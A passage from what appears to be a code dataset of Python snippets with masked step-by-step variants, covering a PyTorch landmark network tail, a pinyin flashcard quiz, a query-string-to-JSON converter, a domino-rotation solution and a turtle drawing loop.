nn.PReLU(),\n nn.Linear(64, 64),\n nn.PReLU(),\n nn.Linear(64, num_classes)\n )\n return pts_net\n\n\n def forward(self, x):\n xs_1 = self.left_eye_net(x[0])\n xs_1 = torch.flatten(xs_1, 1)\n #pdb.set_trace()\n out_1 = self.left_eye_loc(xs_1)\n\n xs_2 = self.right_eye_net(x[1])\n xs_2 = torch.flatten(xs_2, 1)\n out_2 = self.right_eye_loc(xs_2)\n\n xs_3 = self.nose_net(x[2])\n xs_3 = torch.flatten(xs_3, 1)\n out_3 = self.nose_loc(xs_3)\n\n xs_4 = self.mouth_net(x[3])\n xs_4 = torch.flatten(xs_4, 1)\n out_4 = self.mouth_loc(xs_4)\n\n return [out_1, out_2, out_3, out_4]\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n", "step-ids": [ 7, 11, 13, 15, 17 ] }
[ 7, 11, 13, 15, 17 ]
import sys character_dict = {} f = open(sys.argv[1], 'r') while True: pinyin = f.readline().strip() character = f.readline().strip() if not character: break character_dict[pinyin] = character import time fout = open(sys.argv[1][:-3] + "_guess_char.out", 'w') fout.write("-----------------------------") fout.write("\n") import random incorrect = [] pinyin_keys = list(character_dict.keys()) random.shuffle(pinyin_keys) problems_left = pinyin_keys additional = 0 while len(problems_left) > 0: key = problems_left[0] chinese_character = character_dict[key] pinyin = key # result = chinese_character.encode('big5').decode('big5') guess = input("Guess for " + pinyin + "(Press Enter): ") print(chinese_character, "<-- Answer") correctResult = True if input("Did you get it right? y/n?") == "y" else False if correctResult: print("CORRECT! Nice!") else: print("WRONG!", pinyin,"==", chinese_character) fout.write("WRONG! " + pinyin + " == " + chinese_character) fout.write("\n") incorrect.append(pinyin) problems_left.append(pinyin) additional += 1 del problems_left[0] print("Here's the ones you got wrong!") for key in incorrect: print(key, "--", character_dict[key]) fout.write(key + "--" + character_dict[key]) correct_num = len(character_dict) + additional - len(incorrect) print("ACCURACY:", correct_num, "/", len(character_dict) + additional, ":", int(100 * correct_num/(len(character_dict) + additional)), "%") fout.write("ACCURACY: " + str(correct_num) + "/" + str(len(character_dict) + additional) + " : " + str(100 * correct_num/(len(character_dict) + additional)) + "%") fout.write("-----------------------------")
normal
{ "blob_id": "226bb323597100b57ef83eb0d5e4a9b894b77fd2", "index": 9830, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile True:\n pinyin = f.readline().strip()\n character = f.readline().strip()\n if not character:\n break\n character_dict[pinyin] = character\n<mask token>\nfout.write('-----------------------------')\nfout.write('\\n')\n<mask token>\nrandom.shuffle(pinyin_keys)\n<mask token>\nwhile len(problems_left) > 0:\n key = problems_left[0]\n chinese_character = character_dict[key]\n pinyin = key\n guess = input('Guess for ' + pinyin + '(Press Enter): ')\n print(chinese_character, '<-- Answer')\n correctResult = True if input('Did you get it right? y/n?'\n ) == 'y' else False\n if correctResult:\n print('CORRECT! Nice!')\n else:\n print('WRONG!', pinyin, '==', chinese_character)\n fout.write('WRONG! ' + pinyin + ' == ' + chinese_character)\n fout.write('\\n')\n incorrect.append(pinyin)\n problems_left.append(pinyin)\n additional += 1\n del problems_left[0]\nprint(\"Here's the ones you got wrong!\")\nfor key in incorrect:\n print(key, '--', character_dict[key])\n fout.write(key + '--' + character_dict[key])\n<mask token>\nprint('ACCURACY:', correct_num, '/', len(character_dict) + additional, ':',\n int(100 * correct_num / (len(character_dict) + additional)), '%')\nfout.write('ACCURACY: ' + str(correct_num) + '/' + str(len(character_dict) +\n additional) + ' : ' + str(100 * correct_num / (len(character_dict) +\n additional)) + '%')\nfout.write('-----------------------------')\n", "step-3": "<mask token>\ncharacter_dict = {}\nf = open(sys.argv[1], 'r')\nwhile True:\n pinyin = f.readline().strip()\n character = f.readline().strip()\n if not character:\n break\n character_dict[pinyin] = character\n<mask token>\nfout = open(sys.argv[1][:-3] + '_guess_char.out', 'w')\nfout.write('-----------------------------')\nfout.write('\\n')\n<mask token>\nincorrect = []\npinyin_keys = list(character_dict.keys())\nrandom.shuffle(pinyin_keys)\nproblems_left = pinyin_keys\nadditional = 0\nwhile len(problems_left) > 0:\n key = problems_left[0]\n chinese_character = character_dict[key]\n pinyin = key\n guess = input('Guess for ' + pinyin + '(Press Enter): ')\n print(chinese_character, '<-- Answer')\n correctResult = True if input('Did you get it right? y/n?'\n ) == 'y' else False\n if correctResult:\n print('CORRECT! Nice!')\n else:\n print('WRONG!', pinyin, '==', chinese_character)\n fout.write('WRONG! ' + pinyin + ' == ' + chinese_character)\n fout.write('\\n')\n incorrect.append(pinyin)\n problems_left.append(pinyin)\n additional += 1\n del problems_left[0]\nprint(\"Here's the ones you got wrong!\")\nfor key in incorrect:\n print(key, '--', character_dict[key])\n fout.write(key + '--' + character_dict[key])\ncorrect_num = len(character_dict) + additional - len(incorrect)\nprint('ACCURACY:', correct_num, '/', len(character_dict) + additional, ':',\n int(100 * correct_num / (len(character_dict) + additional)), '%')\nfout.write('ACCURACY: ' + str(correct_num) + '/' + str(len(character_dict) +\n additional) + ' : ' + str(100 * correct_num / (len(character_dict) +\n additional)) + '%')\nfout.write('-----------------------------')\n", "step-4": "import sys\ncharacter_dict = {}\nf = open(sys.argv[1], 'r')\nwhile True:\n pinyin = f.readline().strip()\n character = f.readline().strip()\n if not character:\n break\n character_dict[pinyin] = character\nimport time\nfout = open(sys.argv[1][:-3] + '_guess_char.out', 'w')\nfout.write('-----------------------------')\nfout.write('\\n')\nimport random\nincorrect = []\npinyin_keys = list(character_dict.keys())\nrandom.shuffle(pinyin_keys)\nproblems_left = pinyin_keys\nadditional = 0\nwhile len(problems_left) > 0:\n key = problems_left[0]\n chinese_character = character_dict[key]\n pinyin = key\n guess = input('Guess for ' + pinyin + '(Press Enter): ')\n print(chinese_character, '<-- Answer')\n correctResult = True if input('Did you get it right? y/n?'\n ) == 'y' else False\n if correctResult:\n print('CORRECT! Nice!')\n else:\n print('WRONG!', pinyin, '==', chinese_character)\n fout.write('WRONG! ' + pinyin + ' == ' + chinese_character)\n fout.write('\\n')\n incorrect.append(pinyin)\n problems_left.append(pinyin)\n additional += 1\n del problems_left[0]\nprint(\"Here's the ones you got wrong!\")\nfor key in incorrect:\n print(key, '--', character_dict[key])\n fout.write(key + '--' + character_dict[key])\ncorrect_num = len(character_dict) + additional - len(incorrect)\nprint('ACCURACY:', correct_num, '/', len(character_dict) + additional, ':',\n int(100 * correct_num / (len(character_dict) + additional)), '%')\nfout.write('ACCURACY: ' + str(correct_num) + '/' + str(len(character_dict) +\n additional) + ' : ' + str(100 * correct_num / (len(character_dict) +\n additional)) + '%')\nfout.write('-----------------------------')\n", "step-5": "import sys\n\ncharacter_dict = {}\n\nf = open(sys.argv[1], 'r')\nwhile True:\n\tpinyin = f.readline().strip()\n\tcharacter = f.readline().strip()\n\tif not character: break\n\tcharacter_dict[pinyin] = character\nimport time\nfout = open(sys.argv[1][:-3] + \"_guess_char.out\", 'w')\nfout.write(\"-----------------------------\")\nfout.write(\"\\n\")\nimport random\n\nincorrect = []\npinyin_keys = list(character_dict.keys())\nrandom.shuffle(pinyin_keys)\nproblems_left = pinyin_keys\nadditional = 0\nwhile len(problems_left) > 0:\n\tkey = problems_left[0]\n\tchinese_character = character_dict[key]\n\tpinyin = key\n\t# result = chinese_character.encode('big5').decode('big5')\n\tguess = input(\"Guess for \" + pinyin + \"(Press Enter): \")\n\tprint(chinese_character, \"<-- Answer\")\n\tcorrectResult = True if input(\"Did you get it right? y/n?\") == \"y\" else False\n\tif correctResult:\n\t\tprint(\"CORRECT! Nice!\")\n\telse:\n\t\tprint(\"WRONG!\", pinyin,\"==\", chinese_character)\n\t\tfout.write(\"WRONG! \" + pinyin + \" == \" + chinese_character)\n\t\tfout.write(\"\\n\")\n\t\tincorrect.append(pinyin)\n\t\tproblems_left.append(pinyin)\n\t\tadditional += 1\n\tdel problems_left[0]\n\nprint(\"Here's the ones you got wrong!\")\nfor key in incorrect:\n\tprint(key, \"--\", character_dict[key])\n\tfout.write(key + \"--\" + character_dict[key])\ncorrect_num = len(character_dict) + additional - len(incorrect)\nprint(\"ACCURACY:\", correct_num, \"/\", len(character_dict) + additional, \":\", int(100 * correct_num/(len(character_dict) + additional)), \"%\")\nfout.write(\"ACCURACY: \" + str(correct_num) + \"/\" + str(len(character_dict) + additional) + \" : \" + str(100 * correct_num/(len(character_dict) + additional)) + \"%\")\nfout.write(\"-----------------------------\")", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#coding=utf-8 import urllib.parse import json '''转化从charles复制下来的字串,转为json格式''' def to_str(body_str): '''检查需要转化的str是否符合标准''' if not body_str == '': par = body_str.split("&") # print(par) _temp = [] try: for each in par: if "=" not in each: print("参数不合规,请检查") return '' if len(each.split("=")) != 2: print("参数不合规,请检查") return '' if each.split("=")[1] != '': _temp.append(each.split('=')[1]) except: print("参数不合规,请检查") return '' else: print("传入为空:%s"%body_str) return '' return urllib.parse.unquote(body_str) def to_json(body_str): '''转化格式''' try: body_str = to_str(body_str) except: return False body_dict = {} # print(body_str) for each in body_str.split("&"): body_dict[str(each.split("=")[0])] = str(each.split("=")[1]) print(body_dict) with open("demo.json","w") as demo: demo.write(json.dumps(body_dict,indent=4)) if __name__ == '__main__': bstr = '123' to_json(bstr)
normal
{ "blob_id": "d8e9b9f7a8d5ec2a72f083ec2283e8c0724dbe0d", "index": 9119, "step-1": "<mask token>\n\n\ndef to_json(body_str):\n \"\"\"转化格式\"\"\"\n try:\n body_str = to_str(body_str)\n except:\n return False\n body_dict = {}\n for each in body_str.split('&'):\n body_dict[str(each.split('=')[0])] = str(each.split('=')[1])\n print(body_dict)\n with open('demo.json', 'w') as demo:\n demo.write(json.dumps(body_dict, indent=4))\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef to_str(body_str):\n \"\"\"检查需要转化的str是否符合标准\"\"\"\n if not body_str == '':\n par = body_str.split('&')\n _temp = []\n try:\n for each in par:\n if '=' not in each:\n print('参数不合规,请检查')\n return ''\n if len(each.split('=')) != 2:\n print('参数不合规,请检查')\n return ''\n if each.split('=')[1] != '':\n _temp.append(each.split('=')[1])\n except:\n print('参数不合规,请检查')\n return ''\n else:\n print('传入为空:%s' % body_str)\n return ''\n return urllib.parse.unquote(body_str)\n\n\ndef to_json(body_str):\n \"\"\"转化格式\"\"\"\n try:\n body_str = to_str(body_str)\n except:\n return False\n body_dict = {}\n for each in body_str.split('&'):\n body_dict[str(each.split('=')[0])] = str(each.split('=')[1])\n print(body_dict)\n with open('demo.json', 'w') as demo:\n demo.write(json.dumps(body_dict, indent=4))\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef to_str(body_str):\n \"\"\"检查需要转化的str是否符合标准\"\"\"\n if not body_str == '':\n par = body_str.split('&')\n _temp = []\n try:\n for each in par:\n if '=' not in each:\n print('参数不合规,请检查')\n return ''\n if len(each.split('=')) != 2:\n print('参数不合规,请检查')\n return ''\n if each.split('=')[1] != '':\n _temp.append(each.split('=')[1])\n except:\n print('参数不合规,请检查')\n return ''\n else:\n print('传入为空:%s' % body_str)\n return ''\n return urllib.parse.unquote(body_str)\n\n\ndef to_json(body_str):\n \"\"\"转化格式\"\"\"\n try:\n body_str = to_str(body_str)\n except:\n return False\n body_dict = {}\n for each in body_str.split('&'):\n body_dict[str(each.split('=')[0])] = str(each.split('=')[1])\n print(body_dict)\n with open('demo.json', 'w') as demo:\n demo.write(json.dumps(body_dict, indent=4))\n\n\nif __name__ == '__main__':\n bstr = '123'\n to_json(bstr)\n", "step-4": "import urllib.parse\nimport json\n<mask token>\n\n\ndef to_str(body_str):\n \"\"\"检查需要转化的str是否符合标准\"\"\"\n if not body_str == '':\n par = body_str.split('&')\n _temp = []\n try:\n for each in par:\n if '=' not in each:\n print('参数不合规,请检查')\n return ''\n if len(each.split('=')) != 2:\n print('参数不合规,请检查')\n return ''\n if each.split('=')[1] != '':\n _temp.append(each.split('=')[1])\n except:\n print('参数不合规,请检查')\n return ''\n else:\n print('传入为空:%s' % body_str)\n return ''\n return urllib.parse.unquote(body_str)\n\n\ndef to_json(body_str):\n \"\"\"转化格式\"\"\"\n try:\n body_str = to_str(body_str)\n except:\n return False\n body_dict = {}\n for each in body_str.split('&'):\n body_dict[str(each.split('=')[0])] = str(each.split('=')[1])\n print(body_dict)\n with open('demo.json', 'w') as demo:\n demo.write(json.dumps(body_dict, indent=4))\n\n\nif __name__ == '__main__':\n bstr = '123'\n to_json(bstr)\n", "step-5": "#coding=utf-8\nimport urllib.parse\nimport json\n'''转化从charles复制下来的字串,转为json格式'''\ndef to_str(body_str):\n '''检查需要转化的str是否符合标准'''\n if not body_str == '':\n par = body_str.split(\"&\")\n # print(par)\n _temp = []\n try:\n for each in par:\n if \"=\" not in each:\n print(\"参数不合规,请检查\")\n return ''\n if len(each.split(\"=\")) != 2:\n print(\"参数不合规,请检查\")\n return ''\n if each.split(\"=\")[1] != '':\n _temp.append(each.split('=')[1])\n except:\n print(\"参数不合规,请检查\")\n return ''\n else:\n print(\"传入为空:%s\"%body_str)\n return ''\n return urllib.parse.unquote(body_str)\n\ndef to_json(body_str):\n '''转化格式'''\n try:\n body_str = to_str(body_str)\n except:\n return False\n body_dict = {}\n # print(body_str)\n for each in body_str.split(\"&\"):\n body_dict[str(each.split(\"=\")[0])] = str(each.split(\"=\")[1])\n print(body_dict)\n with open(\"demo.json\",\"w\") as demo:\n demo.write(json.dumps(body_dict,indent=4))\nif __name__ == '__main__':\n bstr = '123'\n to_json(bstr)", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from collections import Counter class Solution: def minDominoRotations(self, A: List[int], B: List[int]) ->int: if not A or not B: return 0 if len(A) != len(B): return -1 cnt_a, cnt_b = Counter(A), Counter(B) check_list = [] for num, freq in cnt_a.items(): check_list.append((freq, num, 'a')) for num, freq in cnt_b.items(): check_list.append((freq, num, 'b')) check_list.sort(reverse=True) cnt = 0 for freq, target, lst in check_list: if lst == 'a': to_list, from_list = A, B else: to_list, from_list = B, A invalid = False for i in range(len(A)): if to_list[i] == target: continue if from_list[i] != target: invalid = True break cnt += 1 if not invalid: return cnt return -1
normal
{ "blob_id": "069d85370d8358aa884b5195a1b52c0014efd161", "index": 7637, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n", "step-4": "from collections import Counter\n\n\nclass Solution:\n\n def minDominoRotations(self, A: List[int], B: List[int]) ->int:\n if not A or not B:\n return 0\n if len(A) != len(B):\n return -1\n cnt_a, cnt_b = Counter(A), Counter(B)\n check_list = []\n for num, freq in cnt_a.items():\n check_list.append((freq, num, 'a'))\n for num, freq in cnt_b.items():\n check_list.append((freq, num, 'b'))\n check_list.sort(reverse=True)\n cnt = 0\n for freq, target, lst in check_list:\n if lst == 'a':\n to_list, from_list = A, B\n else:\n to_list, from_list = B, A\n invalid = False\n for i in range(len(A)):\n if to_list[i] == target:\n continue\n if from_list[i] != target:\n invalid = True\n break\n cnt += 1\n if not invalid:\n return cnt\n return -1\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from turtle import * while True: n=input("Right or left? ") if n == 'right': right(60) forward(100) elif n == 'left': left(60) forward(100)
normal
{ "blob_id": "6f698196e9391d73bd99cda0a098a5bf7a3832ff", "index": 963, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile True:\n n = input('Right or left? ')\n if n == 'right':\n right(60)\n forward(100)\n elif n == 'left':\n left(60)\n forward(100)\n", "step-3": "from turtle import *\nwhile True:\n n = input('Right or left? ')\n if n == 'right':\n right(60)\n forward(100)\n elif n == 'left':\n left(60)\n forward(100)\n", "step-4": "from turtle import *\nwhile True:\n n=input(\"Right or left? \")\n\n if n == 'right':\n right(60)\n forward(100)\n elif n == 'left':\n left(60)\n forward(100)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]